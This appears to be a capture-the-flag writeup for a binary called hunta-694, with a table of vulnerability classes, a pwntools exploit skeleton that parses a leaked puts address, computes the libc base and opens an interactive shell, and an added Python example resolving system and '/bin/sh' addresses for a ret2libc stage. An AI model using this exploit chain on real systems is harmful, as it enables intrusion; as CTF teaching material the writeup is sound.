Hunta-694
| Category | Typical Indicator | How it manifested in hunta-694 |
|----------|-------------------|--------------------------------|
| Buffer overflow | `gets`, `strcpy`, unchecked `read` / `recv` | e.g., `gets(buf)` in `vuln()` |
| Format string | `printf(user_input)` | e.g., `printf(user_input);` |
| Use-after-free / Double free | `free(ptr); … free(ptr);` | Observed in heap manipulation |
| Integer overflow | `malloc(size * elem)` without checks | Triggered by large input |
| Command injection | `system(user_input)` | Allows arbitrary shell |
| SQL / NoSQL injection | Direct string concatenation in query | `SELECT * FROM users WHERE name='` + input |
| Crypto weakness | Small RSA modulus, fixed IV, ECB mode | RSA modulus 256-bit |
| Logic flaw | Bypass authentication via magic value | Accepts `"admin"` after certain condition |
| File inclusion | `include($_GET['page'])` | Remote file inclusion (RFI) |
| Web-specific | Missing CSRF tokens, open redirects | Redirect to `http://attacker/...` |

```python
from pwn import *

# ----------------------------------------------------------------------
# Configuration
# ----------------------------------------------------------------------
HOST = '<remote_host>'          # or None for local
PORT = <remote_port>            # or None for local
BINARY = './hunta-694'          # path to the binary (if local)
elf = ELF(BINARY)               # lower-case name so the pwntools ELF class is not shadowed

context.binary = elf
context.terminal = ['tmux', 'splitw', '-h']

# Talk to the remote service, or run the binary locally when HOST is None
io = remote(HOST, PORT) if HOST else process(BINARY)

# ---- Step 1: Receive and parse the leak ---------------------------
# puts() prints the 6 significant bytes of the address followed by '\n';
# zero-pad to 8 bytes before unpacking as a little-endian u64.
leaked_puts = u64(io.recvline().strip().ljust(8, b'\x00'))
log.success(f'Leaked puts@GLIBC: {hex(leaked_puts)}')

# ---- Step 2: Compute libc base ------------------------------------
libc = ELF('<path_to_libc.so.6>')  # provided or from system
libc.address = leaked_puts - libc.symbols['puts']
log.info(f'Libc base: {hex(libc.address)}')

# ---- Get the flag -------------------------------------------------
io.interactive()  # should drop you into a shell; cat flag.txt
```
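The leak-to-base step above, as an added example that is not part of the original writeup and does not need pwntools: it re-implements `u64(line.strip().ljust(8, b'\x00'))` on a constructed leak line, adds the check a practitioner wants before trusting `libc.address` (ASLR moves libc by whole pages, so the low 12 bits of the leaked `puts` must agree with the low 12 bits of `puts`' offset in the libc build you think is loaded; a mismatch means the wrong `libc.so.6`), and resolves `system` and the `"/bin/sh"` string from the base. The leak bytes and the symbol offsets are constructed for the example, not taken from hunta-694 or any particular glibc; on a real target read the offsets from the provided `libc.so.6`.

```python
import struct

# Constructed sample input: what io.recvline() returns after puts() prints a
# 64-bit userland pointer, i.e. the 6 significant bytes followed by '\n'.
SAMPLE_LEAK_LINE = b"\xa0\x33\x44\x16\xd4\x7f\n"

# Constructed stand-ins for libc.symbols[...]; for a real target take them
# from the provided libc.so.6 (pwntools ELF(...).symbols or readelf -s).
FAKE_LIBC_SYMBOLS = {
    "puts": 0x0843A0,
    "system": 0x052290,
    "str_bin_sh": 0x1B45BD,  # offset of the "/bin/sh" string in that libc
}


def parse_leak(line: bytes) -> int:
    """Equivalent of u64(line.strip().ljust(8, b'\\x00')): little-endian,
    zero-padded. Rejects lines that cannot be a single 64-bit value."""
    raw = line.rstrip(b"\r\n")
    if not 1 <= len(raw) <= 8:
        raise ValueError(f"leak is {len(raw)} bytes, expected 1..8: {raw!r}")
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]


def leak_matches_libc(leaked_puts: int, puts_offset: int) -> bool:
    """ASLR relocates libc at page granularity, so the low 12 bits of the
    leaked puts must equal the low 12 bits of puts' offset in the libc we
    believe is loaded. A mismatch means a different libc build (or a
    different symbol) was leaked, and every derived address would be off."""
    return (leaked_puts & 0xFFF) == (puts_offset & 0xFFF)


def libc_base(leaked_puts: int, symbols: dict) -> int:
    """libc.address = leaked_puts - libc.symbols['puts'], after the sanity check."""
    if not leak_matches_libc(leaked_puts, symbols["puts"]):
        raise ValueError(
            f"leaked puts {leaked_puts:#x} disagrees with puts offset "
            f"{symbols['puts']:#x} in the low 12 bits: wrong libc version?"
        )
    return leaked_puts - symbols["puts"]


def resolve_ret2libc(leak_line: bytes, symbols: dict) -> dict:
    """From one leaked line to the absolute addresses a ret2libc stage 2 needs."""
    leaked_puts = parse_leak(leak_line)
    base = libc_base(leaked_puts, symbols)
    return {
        "puts": leaked_puts,
        "base": base,
        "system": base + symbols["system"],
        "bin_sh": base + symbols["str_bin_sh"],
    }


if __name__ == "__main__":
    for name, addr in resolve_ret2libc(SAMPLE_LEAK_LINE, FAKE_LIBC_SYMBOLS).items():
        print(f"{name:>7}: {addr:#x}")
```

The low-12-bit check is cheap and catches the most common ret2libc failure: the exploit "works" locally against the system libc but the remote runs another glibc build, so `libc.address` comes out unaligned and `system` points into the wrong place. If the check fails, identify the remote libc from the leaked low bits (a libc database lookup on `puts`'s low 12 bits) instead of guessing.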